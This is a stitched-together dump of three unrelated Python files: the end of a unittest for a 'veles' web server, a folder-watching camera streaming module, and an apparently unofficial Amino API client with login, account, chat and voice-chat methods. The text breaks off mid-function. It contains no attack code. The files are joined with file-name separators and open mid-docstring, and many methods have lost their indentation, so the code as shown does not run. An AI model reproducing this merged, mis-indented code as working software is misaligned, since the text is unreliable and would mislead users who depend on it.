Created on Feb 11, 2014
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import logging
import threading
import unittest
from veles.config import root
from veles.web_status import WebServer
from veles.tests import timeout
class Test(unittest.TestCase):
    """Smoke test for veles.web_status.WebServer start/stop behaviour."""
    def setUp(self):
        # Point the server at a throwaway log file and a fixed test port.
        root.common.web.log_file = "/tmp/veles_web.test.log"
        root.common.web.port = 8071
        self.ws = WebServer()
    def tearDown(self):
        pass
    @timeout(2)
    def testStop(self):
        """run() must return once stop() is called from another thread."""
        def stop():
            self.ws.stop()
        stopper = threading.Thread(target=stop)
        stopper.start()
        self.ws.run()
        stopper.join()
if __name__ == "__main__":
    # Standard unittest entry point; uncomment below to run a single test.
    logging.basicConfig(level=logging.INFO)
    # import sys;sys.argv = ['', 'Test.testStop']
    unittest.main()
|
FolderCamera.py | import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
from .FolderWatcher import FolderWatcher
class CameraEvent(object):
    """An Event-like class that signals all active clients when a new frame is
    available.
    """
    def __init__(self):
        # Maps client thread/greenlet id -> [threading.Event, last-signal timestamp].
        self.events = {}
    def wait(self):
        """Invoked from each client's thread to wait for the next frame."""
        ident = get_ident()
        if ident not in self.events:
            # this is a new client
            # add an entry for it in the self.events dict
            # each entry has two elements, a threading.Event() and a timestamp
            self.events[ident] = [threading.Event(), time.time()]
        return self.events[ident][0].wait()
    def set(self):
        """Invoked by the camera thread when a new frame is available."""
        now = time.time()
        stale = []
        for ident, event in self.events.items():
            if not event[0].is_set():  # is_set(): isSet() is a deprecated alias
                # Client is waiting: wake it and refresh its last-signal time.
                event[0].set()
                event[1] = now
            elif now - event[1] > 5:
                # The event has stayed set for more than 5 seconds, meaning the
                # client never processed the previous frame: assume it is gone.
                stale.append(ident)
        # Remove EVERY stale client (the original dropped at most one per call,
        # so dead clients could accumulate faster than they were reaped).
        for ident in stale:
            del self.events[ident]
    def clear(self):
        """Invoked from each client's thread after a frame was processed."""
        self.events[get_ident()][0].clear()
class BaseCamera(object):
    """Base class for camera sources.

    A single shared background thread pulls frames from frames() and fans them
    out to all clients through a CameraEvent.  All state is class-level, so
    every instance shares one camera thread.
    """
    thread = None  # background thread that reads frames from camera
    frame = None  # current frame is stored here by background thread
    last_access = 0  # time of last client access to the camera
    event = CameraEvent()
    def __init__(self):
        """Start the background camera thread if it isn't running yet."""
        if BaseCamera.thread is None:
            BaseCamera.last_access = time.time()
            # start background frame thread
            BaseCamera.thread = threading.Thread(target=self._thread)
            BaseCamera.thread.start()
            # wait until frames are available (busy-wait, yielding the CPU)
            while self.get_frame() is None:
                time.sleep(0)
    def get_frame(self):
        """Return the current camera frame, blocking until a new one arrives."""
        BaseCamera.last_access = time.time()
        # wait for a signal from the camera thread
        BaseCamera.event.wait()
        BaseCamera.event.clear()
        return BaseCamera.frame
    @staticmethod
    def frames():
        """Generator that yields frames from the camera; must be overridden."""
        raise RuntimeError('Must be implemented by subclasses.')
    @classmethod
    def _thread(cls):
        """Camera background thread: pump frames until clients go idle."""
        print('Starting camera thread.')
        frames_iterator = cls.frames()
        for frame in frames_iterator:
            BaseCamera.frame = frame
            BaseCamera.event.set()  # send signal to clients
            time.sleep(0)
            # if there hasn't been any clients asking for frames in
            # the last 10 seconds then stop the thread
            if time.time() - BaseCamera.last_access > 10:
                frames_iterator.close()
                print('Stopping camera thread due to inactivity.')
                break
        # Allow a later __init__ to restart the thread.
        BaseCamera.thread = None
class FolderCamera(BaseCamera):
    """Camera source that serves images found by a FolderWatcher."""
    @staticmethod
    def frames():
        # Re-scan the watched folder and emit roughly one frame per second.
        fWatcher = FolderWatcher()
        while True:
            fWatcher.refreshImagesList()
            time.sleep(1)
            yield(fWatcher.getFrame())
|
client.py | # import hmac
import json
import base64
from hashlib import sha1
import requests
import threading
import time
from uuid import UUID
from os import urandom
from time import timezone, sleep
from typing import BinaryIO
from binascii import hexlify
from time import time as timestamp
from locale import getdefaultlocale as locale
from .lib.util import device, headers, helpers, exceptions, objects
from .socket import Callbacks, SocketHandler
device = device.DeviceGenerator()
class Client(Callbacks, SocketHandler):
    def __init__(self, deviceId: str = None, proxies: dict = None, certificatePath = None, socket_trace = False, socketDebugging = False):
        """Create an unauthenticated Amino client and attach the socket machinery.

        - deviceId: use this device id instead of the generated one (optional).
        - proxies / certificatePath: passed straight through to every requests call.
        - socket_trace / socketDebugging: forwarded to SocketHandler.
        """
        self.api = "https://service.narvii.com/api/v1"
        self.authenticated = False
        self.configured = False
        self.user_agent = device.user_agent
        # Prefer the caller-supplied device id over the generated one.
        if deviceId is not None: self.device_id = deviceId
        else: self.device_id = device.device_id
        SocketHandler.__init__(self, self, socket_trace=socket_trace, debug=socketDebugging)
        Callbacks.__init__(self, self)
        self.proxies = proxies
        self.certificatePath = certificatePath
        self.json = None    # raw /auth/login response once logged in
        self.sid = None     # session id
        self.userId = None
        self.account: objects.UserProfile = objects.UserProfile(None)
        self.profile: objects.UserProfile = objects.UserProfile(None)
        #self.check_device(self.device_id)
def parse_headers(self, data = None):
if data is not None:
return headers.Headers(data=data, deviceId=self.device_id).headers
else:
return headers.Headers(deviceId=self.device_id).headers
def join_voice_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Voice Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def join_video_chat(self, comId: str, chatId: str, joinType: int = 1):
"""
Joins a Video Chat
**Parameters**
- **comId** : ID of the Community
- **chatId** : ID of the Chat
"""
# Made by Light, Ley and Phoenix
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = json.dumps(data)
self.send(data)
def join_video_chat_as_viewer(self, comId: str, chatId: str):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = json.dumps(data)
self.send(data)
    def run_vc(self, comId: str, chatId: str, joinType: str):
        """Keep-alive loop for an active voice chat: re-sends the join frame
        (t=112) while self.active is True.  Runs on the thread started by
        start_vc(); end_vc() clears self.active to stop it."""
        # NOTE(review): there is no delay inside this loop, so frames are sent
        # as fast as send() allows -- presumably a periodic sleep was intended;
        # confirm against the server's rate limits before changing.
        while self.active:
            data = {
                "o": {
                    "ndcId": comId,
                    "threadId": chatId,
                    "joinRole": joinType,
                    "id": "2154531" # Need to change?
                },
                "t": 112
            }
            data = json.dumps(data)
            self.send(data)
def start_vc(self, comId: str, chatId: str, joinType: int = 1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
time.sleep(2)
data = json.dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
time.sleep(2)
data = json.dumps(data)
self.send(data)
self.active = True
threading.Thread(target=self.run_vc, args=[comId, chatId, joinType]).start()
def end_vc(self, comId: str, chatId: str, joinType: int = 2):
self.active = False
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = json.dumps(data)
self.send(data)
def login_sid(self, SID: str):
"""
Login into an account with an SID
**Parameters**
- **SID** : SID of the account
"""
uId = helpers.sid_to_uid(SID)
self.authenticated = True
self.sid = SID
self.userId = uId
self.account: objects.UserProfile = self.get_user_info(uId)
self.profile: objects.UserProfile = self.get_user_info(uId)
headers.sid = self.sid
self.start()
self.run_socket()
def login(self, email: str, password: str):
"""
Login into an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"email": email,
"v": 2,
"secret": f"0 {password}",
"deviceID": self.device_id,
"clientType": 100,
"action": "normal",
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/login", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
self.run_socket()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = True
self.json = json.loads(response.text)
self.sid = self.json["sid"]
self.userId = self.json["account"]["uid"]
self.account: objects.UserProfile = objects.UserProfile(self.json["account"]).UserProfile
self.profile: objects.UserProfile = objects.UserProfile(self.json["userProfile"]).UserProfile
headers.sid = self.sid
self.start()
return response.status_code
def register(self, nickname: str, email: str, password: str, verificationCode: str, deviceId: str = device.device_id):
"""
Register an account.
**Parameters**
- **nickname** : Nickname of the account.
- **email** : Email of the account.
- **password** : Password of the account.
- **verificationCode** : Verification code.
- **deviceId** : The device id being registered to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": deviceId,
"email": email,
"clientType": 100,
"nickname": nickname,
"latitude": 0,
"longitude": 0,
"address": None,
"clientCallbackURL": "narviiapp://relogin",
"validationContext": {
"data": {
"code": verificationCode
},
"type": 1,
"identity": email
},
"type": 1,
"identity": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/register", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def restore(self, email: str, password: str):
"""
Restore a deleted account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"secret": f"0 {password}",
"deviceID": device.device_id,
"email": email,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/account/delete-request/cancel", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def logout(self):
"""
Logout from an account.
**Parameters**
- No parameters required.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"deviceID": self.device_id,
"clientType": 100,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/logout", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
self.authenticated = False
self.json = None
self.sid = None
self.userId = None
self.account: None
self.profile: None
headers.sid = None
self.close()
return response.status_code
def configure(self, age: int, gender: str):
"""
Configure the settings of an account.
**Parameters**
- **age** : Age of the account. Minimum is 13.
- **gender** : Gender of the account.
- ``Male``, ``Female`` or ``Non-Binary``
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if gender.lower() == "male": gender = 1
elif gender.lower() == "female": gender = 2
elif gender.lower() == "non-binary": gender = 255
else: raise exceptions.SpecifyType()
if age <= 12: raise exceptions.AgeTooLow()
data = json.dumps({
"age": age,
"gender": gender,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/persona/profile/basic", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def verify(self, email: str, code: str):
"""
Verify an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/check-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/auth/request-security-validation", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/activate-email", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = requests.post(f"{self.api}/g/s/account/delete-request", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/reset-password", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
    def check_device(self, deviceId: str):
        """
        Check if the Device ID is valid.
        **Parameters**
            - **deviceId** : ID of the Device.
        **Returns**
            - **Success** : 200 (int)
            - **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
        """
        data = json.dumps({
            "deviceID": deviceId,
            "bundleID": "com.narvii.amino.master",
            "clientType": 100,
            # NOTE(review): time.timezone is in seconds west of UTC; dividing
            # by 1000 (rather than 60 for minutes) looks odd but matches other
            # Amino clients -- confirm against the API before changing.
            "timezone": -timezone // 1000,
            "systemPushEnabled": True,
            "locale": locale()[0],
            "timestamp": int(timestamp() * 1000)
        })
        response = requests.post(f"{self.api}/g/s/device", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: self.configured = True; return response.status_code
    def get_account_info(self):
        # Fetch the raw account object of the logged-in user as a UserProfile.
        response = requests.get(f"{self.api}/g/s/account", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
    def upload_media(self, file: BinaryIO, fileType: str):
        """
        Upload file to the amino servers.
        **Parameters**
            - **file** : File to be uploaded.
            - **fileType** : "audio" or "image".
        **Returns**
            - **Success** : Url of the file uploaded to the server.
            - **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
        """
        if fileType == "audio":
            t = "audio/aac"
        elif fileType == "image":
            # NOTE(review): "image/jpg" is not a registered MIME type
            # ("image/jpeg" is) -- presumably this is what the Amino API
            # expects; confirm before changing.
            t = "image/jpg"
        else: raise exceptions.SpecifyType(fileType)
        data = file.read()
        response = requests.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data, deviceId=self.device_id).headers, proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: return json.loads(response.text)["mediaValue"]
    def handle_socket_message(self, data):
        # Forward raw socket frames to the Callbacks resolver.
        return self.resolve(data)
    def get_eventlog(self):
        # Fetch the account's event log (English locale) as raw JSON.
        response = requests.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
        if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
        else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.src.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.src.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.src.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType()
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread", data=data, headers=self.parse_headers(data=data), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.src.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = requests.get(url, headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.src.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.src.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.src.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.src.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.src.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.src.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = requests.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers(), proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
